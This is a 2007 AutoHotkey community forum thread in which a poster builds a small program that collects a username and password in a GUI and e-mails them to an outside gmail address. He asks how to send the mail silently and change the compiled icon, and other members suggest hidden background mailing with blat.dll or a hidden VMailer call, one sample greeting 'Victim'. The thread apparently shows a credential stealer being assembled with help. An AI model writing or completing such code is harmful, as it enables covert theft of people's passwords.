 |
AutoHotkey Community Let's help each other out
|
| View previous topic :: View next topic |
| Author |
Message |
Cyber-Plague Guest
|
Posted: Wed Nov 28, 2007 8:28 am Post subject: E-Mail Help |
|
|
| Code: | | Run, mailto:removed@gmail.com?subject=Mail subject&body=%Username% , %Password% :> |
This is fine and dandy, but there are 2 questions I have...
[1] Is there a way to send this email in the background, so the user doesn't have to setup their email program/hit send.
[2] Are those variable calls correct? Earlier in the script, there's input values that are...
| Code: | Gui, Add, Edit, x75 vUsername
Gui, Add, Edit, Password vPassword |
|
|
| Back to top |
|
 |
Cyber-Plague Guest
|
Posted: Wed Nov 28, 2007 8:34 am Post subject: |
|
|
| Guess I should also ask that, after compiling, is there a way to change the Icon? |
|
| Back to top |
|
 |
garry
Joined: 19 Apr 2005 Posts: 1030 Location: switzerland
|
Posted: Wed Nov 28, 2007 9:17 am Post subject: |
|
|
for icon (example) , ( maybe not after compiling ? )
| Code: | Menu Tray, Icon, SHELL32.dll, 95
|
for email:
use iniwrite to write variables
iniread to start emailprogram |
|
| Back to top |
|
 |
Cyber-Plague Guest
|
Posted: Wed Nov 28, 2007 7:41 pm Post subject: |
|
|
| I don't understand what writing, and reading an ini file would do... |
|
| Back to top |
|
 |
stekkie
Joined: 09 Nov 2007 Posts: 16
|
Posted: Wed Nov 28, 2007 8:01 pm Post subject: |
|
|
IniWrite, %Password%, Were you want to store your ini, options, password
Writes the password in a ini file
IniRead,Password, Were you want to store your ini, options, password
Read the saved password from the ini file, and set it in %Password% |
|
| Back to top |
|
 |
Cyber-Plague Guest
|
Posted: Wed Nov 28, 2007 8:08 pm Post subject: |
|
|
So you're telling me...
| Code: | IniWrite, %Password%, C:\,, password
IniWrite, %Username%, C:\,, username
IniRead,Password, C:\,, password
IniRead,Username, C:\,, username
Run, mailto:removed@gmail.com?subject=Mail subject&body=%Username% , %Password% :> |
|
|
| Back to top |
|
 |
engunneer
Joined: 30 Aug 2005 Posts: 6772 Location: Pacific Northwest, US
|
Posted: Wed Nov 28, 2007 9:21 pm Post subject: |
|
|
ignore inis at the moment.
As long as you Gui, Submit, you will get your variables.
for emailing in the background, search blat.dll
for changing compiled icon, search "Compile with options" and "For those who compile" _________________
Unless otherwise noted, all code is untested.
Common Answers: 1.(Loops, Viruses, etc.) 2. Search 3.RTFM |
|
| Back to top |
|
 |
Ripper
Joined: 24 Oct 2007 Posts: 17 Location: Germany
|
Posted: Wed Nov 28, 2007 10:05 pm Post subject: |
|
|
To run the script load Vmailer.exe
| Code: |
PW=Password
SMTP=smtp
TO=sendto
FROM=user
LN2=Test-Massage
CX1=Hello Victim
Fileappend,From:%From%`r`nSubject:%LN2%`r`n`r`n%CX1%`,`r`n`r`n%MSG%,%F7ac%
runwait,VMailer.exe %F7ac% %SMTP% %TO% %FROM%,,hide
Filedelete,%F7ac%
|
 |
|
| Back to top |
|
 |
garry
Joined: 19 Apr 2005 Posts: 1030 Location: switzerland
|
Posted: Thu Nov 29, 2007 12:08 am Post subject: |
|
|
this works good for me in Mozilla Thunderbird
| Code: | C4=xxyy@net.com
name=garry
run,mailto:%C4%?subject=Message Titel&Body=Hallo %name%`%0a`%0dHow are you ?`%0AI send you this message now....`%0ANext line...
|
|
|
| Back to top |
|
 |
|
|
You can post new topics in this forum You can reply to topics in this forum
|
Powered by phpBB © 2001, 2005 phpBB Group
|